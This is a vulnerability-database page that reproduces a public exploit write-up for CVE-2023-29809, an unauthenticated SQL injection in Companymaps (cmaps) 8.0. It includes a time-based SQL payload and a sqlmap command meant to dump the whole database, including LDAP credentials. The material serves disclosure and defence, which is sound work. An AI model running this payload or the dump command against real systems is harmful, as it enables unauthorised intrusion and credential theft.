Vulners
Lucene search
Companymaps 8.0 SQL Injection
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Companymaps 8.0 SQL Injection Vulnerability | 4 May 202300:00 | – | zdt |
| Cmaps v8.0 - SQL injection Vulnerability | 5 May 202300:00 | – | zdt |
 | CVE-2023-29809 | 5 May 202300:00 | – | circl |
 | Companymaps SQL注入漏洞 | 5 May 202300:00 | – | cnnvd |
 | CVE-2023-29809 | 12 May 202300:00 | – | cve |
 | CVE-2023-29809 | 12 May 202300:00 | – | cvelist |
 | Cmaps v8.0 - SQL injection | 5 May 202300:00 | – | exploitdb |
 | EUVD-2023-33347 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-29809 | 12 May 202301:15 | – | nvd |
 | CVE-2023-29809 | 12 May 202301:15 | – | osv |
10
`# Exploit Title: Unauthenticated SQL injection
- Google Dork:
- Date: 27.04.2023
- Exploit Author: Lucas Noki (0xPrototype)
- Vendor Homepage: https://github.com/vogtmh
- Software Link: https://github.com/vogtmh/cmaps
- Version: 8.0
- Tested on: Mac, Windows, Linux
- CVE : CVE-2023-29809
*Description:*
The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message:
```html
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />
```
Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload:
```
'-(select*from(select+sleep(2)+from+dual)a)--+
```
The page will sleep for two seconds. This confirms the SQL injection.
*Steps to reproduce:*
1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```
2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials.
```shell
python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
```
Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.
## Request to the server:
<img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" />
## Response from the server:
Look at the response time.
<img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" />
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 May 2023 00:00Current
6.9Medium risk
Vulners AI Score6.9
EPSS0.08373